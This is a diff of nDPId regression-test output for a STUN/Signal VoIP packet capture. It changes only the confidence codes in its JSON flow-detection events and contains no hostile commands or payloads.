00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1636901998660,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901998660,"pkt":"mt9Y+uvcCL6sCxduCABFIABw9kpAAOQRNE8jnnrTwKgMqQ2WlFIAXFMAAQEAQCESpEJTRld4cWpibUxkeFoAIAAIAAEPi3w9RVEAAQAIAAEumV0v4ROAKwAIAAENliOeetOALAAIAAEAUCOeetOAIgAETm9uZYAoAASDCssQ"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1636901998663,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901998663,"pkt":"CL6sCxdumt9Y+uvcCABFAAA43E9AAEAR8qLAqAypI55605RSAbsAJLdQAAMACCESpEJxcXQycnUyTXoya28AGQAEEQAAAA=="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1636901998865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998865,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgexAAEARxQLAqAyprP15f7qXS2YAHLUpAAEAACESpEJFRDdhYWpCejZ6NGY="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1636901998865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998865,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwge1AAEARxQHAqAyprP15f5RSS2YAHI3jAAEAACESpEJHZko4WW5Ca1ZEVTk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1636901998885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998885,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3FdAAEAR8qLAqAypI55607qXAbsAHB+DAAEAACESpEJDTUpIUUxOenE3VDQ="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998637,"flow_last_seen":1636901998885,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901998885,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998637,"flow_last_seen":1636901998885,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901998885,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1636901998885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998885,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3FhAAEAR8qHAqAypI55605RSAbsAHCWMAAEAACESpEJWNWJyYWFIV0I5bmo="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1636901998967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901998967,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8uXcAACUR6Gus\/Xl\/wKgMqUtmlFIAKLt8AQEADCESpEJHZko4WW5Ca1ZEVTkAIAAIAAEPi3w9RVE="} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1636901998967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901998967,"pkt":"mt9Y+uvcCL6sCxduCABFgAA8OUIAACYRZyGs\/Xl\/wKgMqUtmupcAKOLDAQEADCESpEJFRDdhYWpCejZ6NGYAIAAIAAEPinw9RVE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901998637,"flow_last_seen":1636901999417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901999417,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901998637,"flow_last_seen":1636901999417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901999417,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1636902000024,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000024,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8d+5AAEARXt\/AqAypEsODj7qX0yYAaAl7AAEATCESpEJCeElWSlVyQXpFMWUABgAJMUVaczo3a3NzAAAAwFcABAADAAqAKgAINhoW4DAHa9AAJAAEbn8e\/wAIABTJ3jNA\/lTtI\/cIgWHSZfc\/Jdi3xoAoAAQAuGXB"} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1636902000073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000073,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8d\/NAAEARXtrAqAypEsODj7qX8DoAaE2WAAEATCESpEI3OHB2NXh3VHhSY2IABgAJMUVaczo3a3NzAAAAwFcABAADAAqAKgAINhoW4DAHa9AAJAAEbn8e\/wAIABQCGGRp5dlaWaRPyMCnCJTZLYHOaoAoAATw85Tp"} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1636902000102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1636902000102,"pkt":"mt9Y+uvcCL6sCxduCABFSABcw7JAAAYRTPMSw4OPwKgMqdMmupcASMDpAQEALCESpEJCeElWSlVyQXpFMWUAIAAIAAEPinw9RVEACAAUIB3cDwXbxtjdDKqyJ3Jq4xtLsfaAKAAEpnvqQg=="} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1636902000107,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000107,"pkt":"mt9Y+uvcCL6sCxduCABFSAB8w7NAAAYRTNISw4OPwKgMqdMmupcAaK01AAEATCESpEJBbDNpSTF1eStSR1UABgAJN2tzczoxRVpzAAAAwFcABAAAA+eAKQAIiflXHs5q0dMAJAAEbgAg\/wAIABQSmjpLVWLcQ98KImy+h9G3RC6S1IAoAATBitk4"} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1636902000142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1636902000142,"pkt":"mt9Y+uvcCL6sCxduCABFAABcw7ZAAAYRTTcSw4OPwKgMqfA6upcASKsWAQEALCESpEI3OHB2NXh3VHhSY2IAIAAIAAEPjnw9RVEACAAUJEyhW79\/NO7EtgfmN47ncd2\/SCyAKAAE6dNIHg=="} 
00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1636902000142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000142,"pkt":"mt9Y+uvcCL6sCxduCABFAAB8w7dAAAYRTRYSw4OPwKgMqfA6upcAaP5PAAEATCESpEIwbFM2UjdmdjFzOTMABgAJN2tzczoxRVpzAAAAwFcABAADA4SAKQAIiflXHs5q0dMAJAAEbn8g\/wAIABT+u0FmMYg2qxKb1bY78Qe06uM1KoAoAAQrkPMA"} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901956930,"flow_last_seen":1636901987908,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
-00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956899,"flow_last_seen":1636901980718,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936065,"flow_last_seen":1636901939886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1636902000024,"flow_last_seen":1636902000208,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":488,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956900,"flow_last_seen":1636901978278,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901956930,"flow_last_seen":1636901987908,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956899,"flow_last_seen":1636901980718,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936065,"flow_last_seen":1636901939886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1636902000024,"flow_last_seen":1636902000208,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":488,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956900,"flow_last_seen":1636901978278,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
